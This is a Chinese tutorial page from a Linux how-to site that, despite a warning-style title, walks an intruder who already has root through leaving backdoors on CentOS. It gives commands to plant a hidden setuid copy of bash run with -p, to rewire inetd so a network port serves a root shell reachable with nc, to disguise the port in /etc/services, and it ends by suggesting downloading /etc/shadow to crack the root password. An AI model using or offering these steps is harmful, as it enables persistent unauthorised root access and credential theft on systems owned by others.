• 微课视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 程序设计
  • 信息安全
微课江湖
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 微课视频
  • bios
  • 系统安装
  • 系统进程
  • Windows
  • LINUX
  • RedHat/Centos
  • Ubuntu/Debian
  • Fedora
  • Solaris
  • 麒麟系统
  • 红旗Linux
  • 苹果MAC
  • 注册表
  • 其它系统
您的位置:首页 > 操作系统 >RedHat/Centos > CentOS小心被suid shell与inetd后门利用的详细讲解

CentOS小心被suid shell与inetd后门利用的详细讲解

作者:佚名 字体:[增加 减小] 来源:互联网 时间:2017-05-12

佚名 通过本文向大家介绍了suid,suid afrika,linux suid,suid herpesvirus,suid sgid等相关知识,希望对您有所帮助,也希望大家多多支持微课江湖

你现在已经是root用户,想留一个后门。

CentOS小心被suid shell与inetd后门利用的详细讲解

系统环境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切换成为root用户,并执行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

当然,你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件(在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏).

现在,做为一个普通用户,我们来启用这个后门:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

为什么不行呢?

因为bash2针对suid有一些护卫的措施.但这也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p参数来获取一个rootshell.这个euid的意思是effectiveuserid(关于这些ID的知识,可以戳这里)

这里要特别注意的是,作为一个普通用户执行这个SUIDshell时,一定要使用全路径。

小知识:

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

这时就会返回具有SUID位的文件啦。

2.远程后门:利用/etc/inetd.conf

我们使用vi来修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改为:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

开启inetd:

dawg:~#inetd

如果要强制重启inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

现在我们就可以用nc来爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小贴士:

我们可以修改/etc/services文件,加入以下的东西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我们可以修改成一些常见的端口,以实现隐藏。

小编感言:其实下/etc/shadow文件,爆破root的密码才最保险啊!

</div>
分享到:QQ空间新浪微博腾讯微博微信百度贴吧QQ好友复制网址打印

您可能想查找下面的文章:

  • CentOS系统特殊权限SUID SGID STICKY讲解
  • CentOS小心被suid shell与inetd后门利用的详细讲解

相关文章

  • 2017-05-12CentOS下常用命令整理小结
  • 2017-05-12复制文件与文件夹的CentOS常用命令
  • 2017-05-12CentOS正确关机方法讲解
  • 2017-05-12CentOS 程序设计语言python版本太低如何手动升级
  • 2017-05-12CentOS6 32/64位安装Adobe Flash Player组件的方法
  • 2017-05-12CentOS6.6设置grub密码的方法
  • 2017-05-12CentOS开机启动服务的修改与查看方法讲解
  • 2017-05-12Centos7.2使用中文man详解
  • 2017-05-12Linux下常用压缩格式的压缩与解压方法
  • 2017-05-12CentOS如何设置终端显示字符界面区域的大小?

文章分类

  • bios
  • 系统安装
  • 系统进程
  • Windows
  • LINUX
  • RedHat/Centos
  • Ubuntu/Debian
  • Fedora
  • Solaris
  • 麒麟系统
  • 红旗Linux
  • 苹果MAC
  • 注册表
  • 其它系统

最近更新的内容

    • 在CentOS上安装和使用代理软件HAProxy的完全攻略
    • yum只下载软件不安装的两种方法
    • Linux 下用 Python 连接 MSSql Server 2008
    • Centos系统网卡怎么手动配置?
    • 讲解RedHat系统中一些常用的重要内核文件
    • CentOS挂载lvm分区重名问题的解决方法
    • 如何解决centos7出现了 license information?
    • CentOS桌面版切换登录root账户图文教程
    • CentOS下如何添加动态链接库?
    • Centos 7安装Rclone如何用命令同步国外网盘文件?

关于我们 - 联系我们 - 免责声明 - 网站地图 - 投诉建议

©CopyRight 2015-2017 www.weikejianghu.com Inc All Rights Reserved. 微课江湖 版权所有